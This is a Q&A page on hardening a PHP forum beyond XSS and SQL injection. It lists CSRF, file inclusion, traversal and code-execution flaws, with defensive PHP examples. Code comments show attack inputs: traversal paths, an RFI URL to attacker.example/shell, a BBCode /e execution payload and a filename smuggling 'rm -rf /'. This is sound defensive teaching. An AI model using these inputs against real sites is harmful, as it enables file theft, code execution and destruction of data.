Ways I can protect my site excluding XSS and SQL injection?


Problem description


So, members of my website can post topics, replies, comments, edit them and so on. I always use htmlspecialchars and addslashes for HTML inputs to protect my site against XSS and SQL injection attacks. Is it enough, or is there something more I'm missing?
Thanks.

Recommended answer

There is a lot that can go wrong with a web application. Other than XSS and SQLi, there is:

  1. CSRF - Cross Site Request Forgery
  2. LFI/RFI - Local File Include/Remote File Include caused by include(), require()...
  3. CRLF injection in mail()
  4. Global Variable Namespace Poisoning commonly caused by register_globals, extract(), import_request_variables()
  5. Directory Traversal: fopen(), file_get_contents(), file_put_contents()
  6. Remote Code Execution with eval() or preg_replace() with /e
  7. Remote Code Execution with passthru(), exec(), system() and ``

There is a whole family of vulnerabilities regarding Broken Authentication and Session Management, which is a part of the OWASP Top 10 that every web app programmer must read.

A Study In Scarlet is a good black paper that goes over many of the vulnerabilities that I have listed.

However, there are also strange vulnerabilities like this one in Wordpress. The definitive authority on what is a vulnerability is the CWE system, which classifies HUNDREDS of vulnerabilities, many of which can affect web applications.
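Item 1 in the answer's list, CSRF, is the one most directly relevant to a forum where logged-in members post and edit: without an anti-forgery check, any page a member visits can auto-submit a form to the edit handler and the browser will attach the session cookie. The following is an added example, not code from the answer or from the asker's site, showing a synchronizer-token check in plain PHP; the file name `edit.php`, the hidden field name `csrf_token`, and the stand-in `update_post()` are illustrative assumptions. The array form of `session_set_cookie_params()` needs PHP 7.3 or later.

```php
<?php
// Added example, not code from the answer above: synchronizer-token CSRF
// protection for a forum "edit post" form. File, field and function names
// (edit.php, csrf_token, update_post) are illustrative assumptions.
declare(strict_types=1);

// Defence in depth: a SameSite cookie stops most cross-site form posts from
// carrying the session cookie at all (array form needs PHP >= 7.3).
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,   // assumes the forum is served over HTTPS
    'samesite' => 'Lax',
]);
session_start();

// One token per session, created from the CSPRNG on first use and reused for
// every form, so a member with several tabs open does not get spurious failures.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison; a plain === would leak where the mismatch occurs.
function csrf_check($submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return is_string($submitted)
        && $expected !== ''
        && hash_equals($expected, $submitted);
}

if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST') {
    // Without this check, a hidden auto-submitting form on any third-party
    // page could edit posts as the logged-in member.
    if (!csrf_check($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // Token valid: apply the edit. update_post() is a stand-in for the
    // application's own database write (which should use bound parameters).
    // update_post((int) $_POST['id'], (string) $_POST['body']);
}
?>
<form method="post" action="edit.php">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <textarea name="body"></textarea>
  <button type="submit">Save</button>
</form>
```

The token is bound to the session rather than to the user name, so it is useless to an attacker who does not already hold the victim's session; the `SameSite=Lax` cookie attribute is a second, independent layer and is not a substitute for the token on older browsers.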

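Items 2 and 5 of the list (file inclusion and directory traversal) share one root cause: a user-controlled string reaches a filesystem function. The following added example, not from the answer, shows the vulnerable pattern next to two hardened forms: an allow-list lookup for `include`, and canonicalisation with `realpath()` plus a base-directory prefix check for file reads. The page names, the `uploads/` directory and the query parameters `page` and `file` are assumptions for illustration.

```php
<?php
// Added example, not code from the answer above: hardening the include and
// file-read patterns named in items 2 and 5. Page names, the uploads/
// directory and the query parameter names are illustrative assumptions.
declare(strict_types=1);

// Vulnerable: ?page=../../../../etc/passwd reads any local file (LFI), and with
// allow_url_include=On, ?page=http://attacker.example/shell runs remote code (RFI).
//     include $_GET['page'] . '.php';

// Hardened include: user input is only ever a key into a fixed allow-list,
// so no part of the string is used to build a path.
const PAGES = [
    'home'    => 'pages/home.php',
    'topics'  => 'pages/topics.php',
    'profile' => 'pages/profile.php',
];

function resolve_page(string $requested): ?string
{
    return PAGES[$requested] ?? null;
}

// Vulnerable: ?file=../../config.php discloses source and credentials.
//     echo file_get_contents('uploads/' . $_GET['file']);

// Hardened read: canonicalise, then confirm the result is still inside $baseDir.
function safe_path(string $baseDir, string $userPath): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // NUL bytes truncate paths in the underlying C calls; reject them outright.
    if (strpos($userPath, "\0") !== false) {
        return null;
    }
    // realpath() resolves "..", symlinks and duplicate separators, and returns
    // false for a non-existent target, which is also treated as a rejection.
    $full = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    if ($full === false) {
        return null;
    }
    // Compare with the separator appended so "uploads2/x" cannot pass as "uploads".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($full !== $base && strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $full;
}

// Usage in a front controller.
$page = resolve_page($_GET['page'] ?? 'home');
if ($page === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $page;

$file = safe_path(__DIR__ . '/uploads', $_GET['file'] ?? '');
if ($file === null || !is_file($file)) {
    http_response_code(404);
    exit('No such file');
}
readfile($file);
```

The allow-list is the stronger of the two controls and should be preferred wherever the set of legitimate targets is known in advance; the `realpath()` check is for the case where members genuinely upload arbitrary file names.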
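Items 6 and 7 describe code execution, and the `preg_replace()` `/e` case is especially relevant to a forum: early BBCode parsers used it to turn `[b]...[/b]` into HTML, and `/e` evaluates the replacement string as PHP after substituting the captured text. The following added example, not from the answer, shows that pattern and its safe replacement `preg_replace_callback()`, plus `escapeshellarg()` for the one case where a shell command cannot be avoided. The BBCode tags and the `convert` thumbnail command are assumptions for illustration; the arrow functions need PHP 7.4 or later, and `/e` itself was removed in PHP 7.0.

```php
<?php
// Added example, not code from the answer above: items 6 and 7 in a forum
// context. The BBCode tags and the thumbnail command are illustrative assumptions.
declare(strict_types=1);

// Vulnerable (PHP < 7.0): with /e the replacement is PHP source. PHP escapes
// quotes in $1, but not braces, so a post containing  [b]{${phpinfo()}}[/b]
// becomes  "<b>" . strtoupper("{${phpinfo()}}") . "</b>"  and runs phpinfo().
//     $html = preg_replace('/\[b\](.*?)\[\/b\]/e', '"<b>" . strtoupper("$1") . "</b>"', $post);

function render_bbcode(string $post): string
{
    // Escape first, so member text can only ever become text, never markup.
    $safe = htmlspecialchars($post, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    $rules = [
        '/\[b\](.*?)\[\/b\]/s' => fn(array $m): string => '<b>' . $m[1] . '</b>',
        '/\[i\](.*?)\[\/i\]/s' => fn(array $m): string => '<i>' . $m[1] . '</i>',
        // Only http(s) URLs are linked, and the same escaped text is used as
        // both the attribute value and the link text. Ampersands are already
        // &amp; after escaping, which is the correct form inside an href.
        '/\[url\](https?:\/\/[^\s\[\]"\'<>]+)\[\/url\]/i'
            => fn(array $m): string => '<a href="' . $m[1] . '" rel="nofollow">' . $m[1] . '</a>',
    ];

    foreach ($rules as $pattern => $callback) {
        // The callback receives the match as data; nothing is evaluated as PHP.
        $safe = preg_replace_callback($pattern, $callback, $safe);
    }
    return $safe;
}

// Item 7: if a shell command is unavoidable, every user-derived piece goes
// through escapeshellarg(), and the file name is reduced to its basename.
function thumbnail_command(string $uploadedName): string
{
    // Vulnerable: exec("convert uploads/$uploadedName -resize 100x100 thumbs/$uploadedName");
    // An upload named  x.png; rm -rf /  would run the second command.
    $name = basename($uploadedName);
    $src  = escapeshellarg('uploads/' . $name);
    $dst  = escapeshellarg('thumbs/' . $name);
    return "convert $src -resize 100x100 $dst";
}

// Usage: the first call yields bold text with the braces left as literal
// characters; the second yields a command whose arguments are single-quoted.
echo render_bbcode('[b]{${phpinfo()}}[/b]'), "\n";
echo thumbnail_command('x.png; rm -rf /'), "\n";
```

A stricter design than `escapeshellarg()` is to avoid the shell entirely (for example `proc_open()` with an argument array on PHP 7.4+, or an image library instead of an external binary); the example keeps the shell form only to show the minimum that makes item 7 safe.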